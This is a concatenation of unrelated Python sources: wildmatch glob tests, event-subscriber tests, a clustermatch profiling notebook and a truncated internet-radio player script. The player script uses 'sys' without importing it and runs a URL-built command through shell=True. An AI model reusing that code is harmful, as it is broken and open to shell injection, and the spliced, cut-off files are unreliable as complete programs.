self.match_wild_star(u'foo/**/**/bar', u'foo/b/a/z/bar', True)
self.match_wild_star(u'foo/**/bar', u'foo/bar', True)
self.match_wild_star(u'foo/**/**/bar', u'foo/bar', True)
self.match_wild_star(u'foo?bar', u'foo/bar', False)
self.match_wild_star(u'foo[/]bar', u'foo/bar', False)
self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo/bar', False)
self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo-bar', True)
self.match_wild_star(u'**/foo', u'foo', True)
self.match_wild_star(u'**/foo', u'/foo', True)
self.match_wild_star(u'**/foo', u'bar/baz/foo', True)
self.match_wild_star(u'*/foo', u'bar/baz/foo', False)
self.match_wild_star(u'**/bar*', u'foo/bar/baz', False)
# File/directory distinction
self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz', True)
self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz/', False)
self.match_wild_star(u'**/bar/**', u'deep/foo/bar/baz/', True)
self.match_wild_star(u'**/bar/*', u'deep/foo/bar', False)
self.match_wild_star(u'**/bar/**', u'deep/foo/bar/', True)
# self.match_wild_star(u'**/bar**', u'foo/bar/baz', False)
self.match_wild_star(u'*/bar/**', u'foo/bar/baz/x', True)
self.match_wild_star(u'*/bar/**', u'deep/foo/bar/baz/x', False)
self.match_wild_star(u'**/bar/*/*', u'deep/foo/bar/baz/x', True)
# Various additional tests
self.match_wild_star(u'a[c-c]st', u'acrt', False)
self.match_wild_star(u'a[c-c]rt', u'acrt', True)
self.match_wild_star(u'[!]-]', u']', False)
self.match_wild_star(u'[!]-]', u'a', True)
self.match_wild_star(u'\\', u'', None)
self.match_wild_star(u'\\', u'\\', None)
self.match_wild_star(u'*/\\', u'/\\', None)
self.match_wild_star(u'*/\\\\', u'/\\', True)
self.match_wild_star(u'foo', u'foo', True)
self.match_wild_star(u'@foo', u'@foo', True)
self.match_wild_star(u'@foo', u'foo', False)
self.match_wild_star(u'\\[ab]', u'[ab]', True)
# self.match_wild_star(u'[[]ab]', u'[ab]', True)
# self.match_wild_star(u'[[:]ab]', u'[ab]', True)
# self.match_wild_star(u'[[::]ab]', u'[ab]', False)
# self.match_wild_star(u'[[:digit]ab]', u'[ab]', True)
# self.match_wild_star(u'[\\[:]ab]', u'[ab]', True)
self.match_wild_star(u'\\??\\?b', u'?a?b', True)
self.match_wild_star(u'\\a\\b\\c', u'abc', True)
self.match_wild_star(u'', u'foo', False)
self.match_wild_star(u'**/t[o]', u'foo/bar/baz/to', True)
# Character class tests
#
# self.match_wild_star(u'[[:alpha:]][[:digit:]][[:upper:]]', u'a1B', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'a', False)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'A', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'1', True)
# self.match_wild_star(u'[[:digit:][:upper:][:spaci:]]', u'1', False)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u' ', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'.', False)
# self.match_wild_star(u'[[:digit:][:punct:][:space:]]', u'.', True)
# self.match_wild_star(u'[[:xdigit:]]', u'5', True)
# self.match_wild_star(u'[[:xdigit:]]', u'f', True)
# self.match_wild_star(u'[[:xdigit:]]', u'D', True)
# self.match_wild_star(u'[[:alnum:][:alpha:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:][:xdigit:]]', u'_', True)
# self.match_wild_star(u'[^[:alnum:][:alpha:][:blank:][:cntrl:][:digit:][:lower:][:space:][:upper:][:xdigit:]]', u'.', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'5', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'b', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'y', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'q', False)
# Additional tests, including some malformed wildmatch patterns
self.match_wild_star(u'[\\\\-^]', u']', True)
self.match_wild_star(u'[\\\\-^]', u'[', False)
self.match_wild_star(u'[\\-_]', u'-', True)
self.match_wild_star(u'[\\]]', u']', True)
self.match_wild_star(u'[\\]]', u'\\]', False)
self.match_wild_star(u'[\\]]', u'\\', False)
self.match_wild_star(u'a[]b', u'ab', None)
self.match_wild_star(u'a[]b', u'a[]b', None)
self.match_wild_star(u'ab[', u'ab[', None)
self.match_wild_star(u'[!', u'ab', None)
self.match_wild_star(u'[-', u'ab', None)
self.match_wild_star(u'[-]', u'-', True)
self.match_wild_star(u'[a-', u'-', None)
self.match_wild_star(u'[!a-', u'-', None)
self.match_wild_star(u'[--A]', u'-', True)
self.match_wild_star(u'[--A]', u'5', True)
self.match_wild_star(u'[ --]', u' ', True)
self.match_wild_star(u'[ --]', u'$', True)
self.match_wild_star(u'[ --]', u'-', True)
self.match_wild_star(u'[ --]', u'0', False)
self.match_wild_star(u'[---]', u'-', True)
self.match_wild_star(u'[------]', u'-', True)
self.match_wild_star(u'[a-e-n]', u'j', False)
self.match_wild_star(u'[a-e-n]', u'-', True)
self.match_wild_star(u'[!------]', u'a', True)
self.match_wild_star(u'[]-a]', u'[', False)
self.match_wild_star(u'[]-a]', u'^', True)
self.match_wild_star(u'[!]-a]', u'^', False)
self.match_wild_star(u'[!]-a]', u'[', True)
self.match_wild_star(u'[a^bc]', u'^', True)
self.match_wild_star(u'[a-]b]', u'-b]', True)
self.match_wild_star(u'[\\]', u'\\', None)
self.match_wild_star(u'[\\\\]', u'\\', True)
self.match_wild_star(u'[!\\\\]', u'\\', False)
self.match_wild_star(u'[A-\\\\]', u'G', True)
self.match_wild_star(u'b*a', u'aaabbb', False)
self.match_wild_star(u'*ba*', u'aabcaa', False)
self.match_wild_star(u'[,]', u',', True)
self.match_wild_star(u'[\\\\,]', u',', True)
self.match_wild_star(u'[\\\\,]', u'\\', True)
self.match_wild_star(u'[,-.]', u'-', True)
self.match_wild_star(u'[,-.]', u'+', False)
self.match_wild_star(u'[,-.]', u'-.]', False)
self.match_wild_star(u'[\\1-\\3]', u'2', True)
self.match_wild_star(u'[\\1-\\3]', u'3', True)
self.match_wild_star(u'[\\1-\\3]', u'4', False)
self.match_wild_star(u'[[-\\]]', u'\\', True)
self.match_wild_star(u'[[-\\]]', u'[', True)
self.match_wild_star(u'[[-\\]]', u']', True)
self.match_wild_star(u'[[-\\]]', u'-', False)
# Test for git's implementation (recursion and abort code)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-m-70-iso8859-1', True)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-X-70-iso8859-1', False)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-/-70-iso8859-1', False)
self.match_wild_star(u'XXX/*/*/*/*/*/*/12/*/*/*/m/*/*/*', u'XXX/adobe/courier/bold/o/normal//12/120/75/75/m/70/iso8859/1', True)
self.match_wild_star(u'XXX/*/*/*/*/*/*/12/*/*/*/m/*/*/*', u'XXX/adobe/courier/bold/o/normal//12/120/75/75/X/70/iso8859/1', False)
self.match_wild_star(u'**/*a*b*g*n*t', u'abcd/abcdefg/abcdefghijk/abcdefghijklmnop.txt', True)
self.match_wild_star(u'**/*a*b*g*n*t', u'abcd/abcdefg/abcdefghijk/abcdefghijklmnop.txtz', False)
self.match_wild_star(u'*/*/*', u'foo', False)
self.match_wild_star(u'*/*/*', u'foo/bar', False)
self.match_wild_star(u'*/*/*', u'foo/bba/arr', True)
self.match_wild_star(u'*/*/*', u'foo/bb/aa/rr', False)
self.match_wild_star(u'**/**/**', u'foo/bb/aa/rr', True)
self.match_wild_star(u'*X*i', u'abcXdefXghi', True)
self.match_wild_star(u'*X*i', u'ab/cXd/efXg/hi', False)
self.match_wild_star(u'*/*X*/*/*i', u'ab/cXd/efXg/hi', True)
self.match_wild_star(u'**/*X*/**/*i', u'ab/cXd/efXg/hi', True)
# Test path_name option
#
# self.match(u'foo', u'foo', True)
# self.match(u'fo', u'foo', False)
# self.match(u'foo/bar', u'foo/bar', True)
# self.match(u'foo/*', u'foo/bar', True)
# self.match(u'foo/*', u'foo/bba/arr', True)
# self.match(u'foo/**', u'foo/bba/arr', True)
# self.match(u'foo*', u'foo/bba/arr', True)
# self.match(u'foo**', u'foo/bba/arr', True)
# self.match(u'foo/*arr', u'foo/bba/arr', True)
# self.match(u'foo/**arr', u'foo/bba/arr', True)
# self.match(u'foo/*z', u'foo/bba/arr', False)
# self.match(u'foo/**z', u'foo/bba/arr', False)
# self.match(u'foo?bar', u'foo/bar', True)
# self.match(u'foo[/]bar', u'foo/bar', True)
# self.match(u'*/*/*', u'foo', False)
# self.match(u'*/*/*', u'foo/bar', True)
# self.match(u'*/*/*', u'foo/bba/arr', True)
# self.match(u'*/*/*', u'foo/bb/aa/rr', True)
# self.match(u'*X*i', u'abcXdefXghi', True)
# self.match(u'*/*X*/*/*i', u'ab/cXd/efXg/hi', True)
# self.match(u'*Xg*i', u'ab/cXd/efXg/hi', True)
#
# # Case-sensitivy features
#
# self.match_wild_star(u'[A-Z]', u'a', False)
# self.match_wild_star(u'[A-Z]', u'A', True)
# self.match_wild_star(u'[a-z]', u'A', False)
# self.match_wild_star(u'[a-z]', u'a', True)
# self.match_wild_star(u'[[:upper:]]', u'a', False)
# self.match_wild_star(u'[[:upper:]]', u'A', True)
# self.match_wild_star(u'[[:lower:]]', u'A', False)
# self.match_wild_star(u'[[:lower:]]', u'a', True)
# self.match_wild_star(u'[B-Za]', u'A', False)
# self.match_wild_star(u'[B-Za]', u'a', True)
# self.match_wild_star(u'[B-a]', u'A', False)
# self.match_wild_star(u'[B-a]', u'a', True)
# self.match_wild_star(u'[Z-y]', u'z', False)
# self.match_wild_star(u'[Z-y]', u'Z', True)
#
# self.match_case_fold(u'[A-Z]', u'a', True)
# self.match_case_fold(u'[A-Z]', u'A', True)
# self.match_case_fold(u'[a-z]', u'A', True)
# self.match_case_fold(u'[a-z]', u'a', True)
# self.match_case_fold(u'[[:upper:]]', u'a', True)
# self.match_case_fold(u'[[:upper:]]', u'A', True)
# self.match_case_fold(u'[[:lower:]]', u'A', True)
# self.match_case_fold(u'[[:lower:]]', u'a', True)
# self.match_case_fold(u'[B-Za]', u'A', True)
# self.match_case_fold(u'[B-Za]', u'a', True)
# self.match_case_fold(u'[B-a]', u'A', True)
# self.match_case_fold(u'[B-a]', u'a', True)
# self.match_case_fold(u'[Z-y]', u'z', True)
# self.match_case_fold(u'[Z-y]', u'Z', True)
# Additional tests
# self.match_wild_star(u'[[:space:]-\\]]', u'-', True)
self.match_wild_star(u'[]-z]', u'c', True)
self.match_wild_star(u'[]-z]', u'-', False)
# self.match_wild_star(u'[[:space:]-z]', u'c', False)
self.match_wild_star(u'foo', u'foo/bar', False)
self.match_wild_star(u'foo', u'bar/foo', False)
self.match_wild_star(u'foo', u'bar/foo/baz', False)
self.match_wild_star(u'foo/**/bar', u'foo//bar', True)
self.match_wild_star(u'foo]bar', u'foo]bar', True)
self.match_wild_star(u'foo[bar', u'foo[bar', None)
# self.match_wild_star(u'foo/**bar', u'foo/bar', False)
# self.match_wild_star(u'foo/**bar', u'foo/x/bar', False)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/*****', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/******', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/***/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/***/***', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**/***/****/*****', u'deep/foo/bar/baz/x', True)
# def test_translate(self):
# # Basic wildmatch features
#
# self.translate(u'foo', u'\Afoo\Z')
# self.translate(u'???', u'\A[^/][^/][^/]\Z')
# self.translate(u'??', u'\A[^/][^/]\Z')
#
# # Extended slash-matching features
#
# self.translate(u'foo*bar', u'\Afoo[^/]*bar\Z')
# # u'foo/baz/bar' -> False
#
# self.translate(u'foo**bar', u'\A\Z')
# # u'foo/baz/bar' -> False
# # u'foobazbar' -> False
#
# self.translate(u'foo/**/bar', u'\Afoo/(?:.*/)*bar\Z')
# # u'foo/baz/bar' -> True
# # u'foo/b/a/z/bar' -> True
# # u'foo/bar' -> True
#
# self.translate(u'foo/**/**/bar', u'\Afoo/(?:.*/)*bar\Z')
# # u'foo/baz/bar' -> True
# # u'foo/b/a/z/bar' -> True
# # u'foo/bar' -> True
#
# self.translate(u'foo?bar', u'\Afoo[^/]bar\Z')
# # u'foo/bar' -> False
#
# self.translate(u'foo[/]bar', None)
# # u'foo/bar' -> False
#
# self.translate(u'', u'\A\Z')
# self.translate(u'', u'\A\Z')
#
#
#
# self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo/bar', False)
# self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo-bar', True)
# self.match_wild_star(u'**/foo', u'foo', True)
# self.match_wild_star(u'**/foo', u'/foo', True)
# self.match_wild_star(u'**/foo', u'bar/baz/foo', True)
# self.match_wild_star(u'*/foo', u'bar/baz/foo', False)
# self.match_wild_star(u'**/bar*', u'foo/bar/baz', False)
#
# # File/directory distinction
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz', True)
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz/', False)
# self.match_wild_star(u'**/bar/**', u'deep/foo/bar/baz/', True)
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar', False)
# self.match_wild_star(u'**/bar/**', u'deep/foo/bar/', True)
# self.match_wild_star(u'**/bar**', u'foo/bar/baz', False)
# self.match_wild_star(u'*/bar/**', u'foo/bar/baz/x', True)
# self.match_wild_star(u'*/bar/**', u'deep/foo/bar/baz/x', False)
# self.match_wild_star(u'**/bar/*/*', u'deep/foo/bar/baz/x', True)
def test_parse_bracket_expression(self):
# Empty bracket expression is invalid
self.parse_bracket_expression(
u'[]',
None)
# Single character
self.parse_bracket_expression(
u'[a]',
True,
[
wildmatch._create_be_collating_element(u'a'),
])
# Multiple characters
self.parse_bracket_expression(
u'[abc]',
True,
[
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'c'),
])
# Range expression
self.parse_bracket_expression(
u'[a-b]',
True,
[
wildmatch._create_be_range(u'a', u'b'),
])
# Multi-character collating element
self.parse_bracket_expression(
u'[[.ab.]]',
True,
[
wildmatch._create_be_collating_element(u'ab'),
])
# Equivalence class
self.parse_bracket_expression(
u'[[=ab=]]',
True,
[
wildmatch._create_be_equivalence_class(u'ab'),
])
# Character class
self.parse_bracket_expression(
u'[[:alpha:]]',
True,
[
wildmatch._create_be_character_class(u'alpha'),
])
# Meta characters
self.parse_bracket_expression(
u'[]a-]',
True,
[
wildmatch._create_be_collating_element(u']'),
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'-'),
])
# Dash and range
self.parse_bracket_expression(
u'[-a-b]',
True,
[
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_range(u'a', u'b'),
])
# Dashes do not create ranges with classes
self.parse_bracket_expression(
u'[[:alpha:]-ab-[=c=]]',
True,
[
wildmatch._create_be_character_class(u'alpha'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_equivalence_class(u'c'),
])
# Complex expression
self.parse_bracket_expression(
u'[^][:alpha:]-a-[.ch.]--- --[=oe=]-b-]',
False,
[
wildmatch._create_be_collating_element(u']'),
wildmatch._create_be_character_class(u'alpha'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_range(u'a', u'ch'),
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u' ', u'-'),
wildmatch._create_be_equivalence_class(u'oe'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'-'),
])
# Range with escaped literal
self.parse_bracket_expression(
u'[\\\\-^]',
True,
[
wildmatch._create_be_range(u'\\', u'^'),
])
# Escaped dash
self.parse_bracket_expression(
u'[\\-_]',
True,
[
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'_'),
])
# Escaped end of bracket expression
self.parse_bracket_expression(
u'[\\]]',
True,
[
wildmatch._create_be_collating_element(u']'),
])
# Incomplete expression
self.parse_bracket_expression(
u'[',
None)
# Incomplete negated expression
self.parse_bracket_expression(
u'[!',
None)
# Incomplete expression with dash
self.parse_bracket_expression(
u'[-',
None)
# Dash matching
self.parse_bracket_expression(
u'[-]',
True,
[
wildmatch._create_be_collating_element(u'-'),
])
# Incomplete expression with a and dash
self.parse_bracket_expression(
u'[a-',
None)
# Incomplete negated expression with a and dash
self.parse_bracket_expression(
u'[!a-',
None)
# Range starting with dash
self.parse_bracket_expression(
u'[--A]',
True,
[
wildmatch._create_be_range(u'-', u'A'),
])
# Range ending with dash
self.parse_bracket_expression(
u'[ --]',
True,
[
wildmatch._create_be_range(u' ', u'-'),
])
# Chained range: the first range has priority
self.parse_bracket_expression(
u'[a-b-c]',
True,
[
wildmatch._create_be_range(u'a', u'b'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'c'),
])
# Range of dashes
self.parse_bracket_expression(
u'[---]',
True,
[
wildmatch._create_be_range(u'-', u'-'),
])
# Double range of dashes
self.parse_bracket_expression(
u'[------]',
True,
[
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u'-', u'-'),
])
# Negated double range of dashes
self.parse_bracket_expression(
u'[!------]',
False,
[
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u'-', u'-'),
])
# Range with right bracket
self.parse_bracket_expression(
u'[]-a]',
True,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negated range with right bracket
self.parse_bracket_expression(
u'[!]-a]',
False,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negated range with right bracket
self.parse_bracket_expression(
u'[!]-a]',
False,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negation character as collating element
self.parse_bracket_expression(
u'[a^bc]',
True,
[
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'^'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'c'),
])
# Incomplete bracket expression caused by escape
self.parse_bracket_expression(
u'[\\]',
None)
# Match escape
self.parse_bracket_expression(
u'[\\\\]',
True,
[
wildmatch._create_be_collating_element(u'\\'),
])
# Negated escape matching
self.parse_bracket_expression(
u'[^\\\\]',
False,
[
wildmatch._create_be_collating_element(u'\\'),
])
# Range with escape
self.parse_bracket_expression(
u'[A-\\\\]',
True,
[
wildmatch._create_be_range(u'A', u'\\'),
])
# Range with punctuation
self.parse_bracket_expression(
u'[,-.]',
True,
[
wildmatch._create_be_range(u',', u'.'),
])
# Range similar to nested bracket expression
self.parse_bracket_expression(
u'[[-\\]]',
True,
[
wildmatch._create_be_range(u'[', u']'),
])
if __name__ == u'__main__':
unittest.main()
|
<filename>tests/test_core_subscribe.py
import json
from uuid import uuid4
import httpretty
from protonpack.core import Event
from protonpack.core.subscribe import SubscriberManager, Subscriber, Protocol
from .test_utils import RedisRunnerContext
def test_create_and_list_streams():
with RedisRunnerContext():
subs = SubscriberManager.list_subscribers()
existing_len = len(subs)
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
ok = SubscriberManager.put_subscriber(subscriber)
assert ok is True
subs = SubscriberManager.list_subscribers()
assert existing_len + 1 == len(subs)
this_one = None
for sub in subs:
if sub.subscriber_name == subscriber.subscriber_name:
this_one = sub
break
assert this_one is not None
print(this_one.to_dict())
print(subscriber.to_dict())
assert this_one.stream == subscriber.stream
assert this_one.subscriber_name == subscriber.subscriber_name
assert set(this_one.topics) == set(subscriber.topics)
assert set(this_one.evt_types) == set(subscriber.evt_types)
assert set(this_one.activities) == set(subscriber.activities)
assert this_one.protocol == subscriber.protocol
assert this_one.endpoint == subscriber.endpoint
assert this_one == subscriber
def test_del_subscriber():
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
ok = SubscriberManager.put_subscriber(subscriber)
assert ok is True
subs = SubscriberManager.list_subscribers()
assert len(subs) == 1
for sub in subs:
SubscriberManager.del_subscriber(sub)
subs = SubscriberManager.list_subscribers()
assert len(subs) == 0
@httpretty.activate
def test_handle_event():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="SYS",
activity="init",
ref_id="00",
)
ok = subscriber.handle_event(event, "consumer_group", "consumer_id")
assert ok
called = httpretty.last_request()
body = json.loads(called.body)
assert body["stream"] == subscriber.stream
assert body["event"]["event_id"] == event.event_id
assert body["event"]["topic"] == event.topic
assert body["event"]["evt_type"] == event.evt_type
assert body["event"]["activity"] == event.activity
assert body["event"]["ref_id"] == event.ref_id
assert body["consumer_group"] == "consumer_group"
assert body["consumer_id"] == "consumer_id"
assert body["subscriber_name"] == subscriber.subscriber_name
@httpretty.activate
def test_handle_event_mismatch_topic():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="jazz",
evt_type="SYS",
activity="init",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
@httpretty.activate
def test_handle_event_mismatch_evt_type():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="BOM",
activity="init",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
@httpretty.activate
def test_handle_event_mismatch_activities():
httpretty.register_uri(
httpretty.POST,
"http://example.com"
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="SYS",
activity="write",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
|
<gh_stars>0
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.5
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# Exactly the same code as in `08`, but here I run the notebook in a different machine (desktop).
# %% [markdown] tags=[]
# # Remove pycache dir
# %% tags=[]
# !echo ${CODE_DIR}
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -print
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -prune -exec rm -rf {} \;
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -print
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
import numpy as np
from clustermatch.coef import cm
# %% [markdown] tags=[]
# # Settings
# %% tags=[]
N_REPS = 10
# %% tags=[]
np.random.seed(0)
# %% [markdown] tags=[]
# # Setup
# %% tags=[]
# let numba compile all the code before profiling
cm(np.random.rand(10), np.random.rand(10))
# %% [markdown] tags=[]
# # Run with `n_samples` small
# %% [markdown] tags=[]
# ## `n_samples=50`
# %% tags=[]
N_SAMPLES = 50
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_50.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=100`
# %% tags=[]
N_SAMPLES = 100
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_100.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=500`
# %% tags=[]
N_SAMPLES = 500
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_500.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=1000`
# %% tags=[]
N_SAMPLES = 1000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_1000.txt
func()
# %% [markdown] tags=[]
# # Run with `n_samples` large
# %% [markdown] tags=[]
# ## `n_samples=50000`
# %% tags=[]
N_SAMPLES = 50000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_large_50000.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=100000`
# %% tags=[]
N_SAMPLES = 100000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_large_100000.txt
func()
# %% tags=[]
|
#!/usr/bin/env python
import subprocess
import random
import json
import urllib2
import itertools
import os.path
import time
import hashlib
from functools import wraps
try:
from bs4 import BeautifulSoup
except ImportError:
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
BeautifulSoup = None
class InvalidMode(Exception): pass
class InvalidStream(Exception): pass
class StreamError(Exception): pass
class ConfigError(Exception): pass
MODES = ['di', 'sky']
QUALITIES = {
'mp3': [
'premium_high', #256k
'premium', #128k
'public3', #96k
],
'aac': [
'premium_medium', #64k
'premium_low', #40k
'public2', #40k
],
# 'wma': [
# 'premium_wma', #128k
# 'premium_wma_low', #64k
# 'public5', #40k
# ],
}
DEFAULT_PLAYER = 'mplayer -really-quiet {stream_url}'
def identify_stream(wrapped):
@wraps(wrapped)
def wrapper(self, stream=None, **kwargs):
if stream is None:
stream = self._identify_stream(**kwargs)
return wrapped(self, stream)
return wrapper
def identify_stream_and_mode(wrapped):
@wraps(wrapped)
@identify_stream
def wrapper(self, stream, mode=None):
if mode is None:
mode = self._identify_stream_mode(stream)
return wrapped(self, stream, mode)
return wrapper
class AudioAddictSite(object):
_mode = None
player = None
quality = None
STREAM_CACHE_TTL = 86400
def __init__(self, mode='all', quality='public3',
player=DEFAULT_PLAYER, **kwargs):
self._mode = mode
self.quality = quality
self.player = player
self._config = kwargs
self._soups = dict((m, None) for m in MODES)
@property
def stream_list(self):
if self._mode == 'all':
return list(itertools.chain.from_iterable(
self._get_stream_list(mode) for mode in MODES))
else:
return self._get_stream_list(self._mode)
@identify_stream_and_mode
def get_stream_icon(self, stream, mode):
if self._soups[mode] is None:
icons_url = 'http://{mode}.fm/'.format(mode=mode)
if BeautifulSoup is not None:
self._soups[mode] = BeautifulSoup(urllib2.urlopen(icons_url))
else:
raise Exception('Icon support requires the BeautifulSoup module')
soup = self._soups[mode]
stream_icon = soup.find('img', title=stream['name']).get('src', '')
return stream_icon
@identify_stream
def play_stream(self, stream):
stream_url = self.get_stream_url(stream=stream)
try:
with open('/dev/null', 'w') as dev_null:
return subprocess.call(self.player.format(stream_url=stream_url),
stdin=sys.stdin,
stdout=sys.stdout,
stderr=dev_null,
shell=True)
except TypeError as err:
raise StreamError(err)
except KeyboardInterrupt:
return None
@identify_stream
def get_stream_url(self, stream):
pls_url = stream['playlist']
if self.quality.startswith('premium'):
try:
pls_url = '{url}?{auth_key}'.format(
url=pls_url,
auth_key=self._config['auth_key'])
except KeyError:
raise ConfigError('Premium quality stations require auth_key')
return random.choice([line.strip().split('=')[1] \
for line in urllib2.urlopen(pls_url).read().strip().split('\n') \
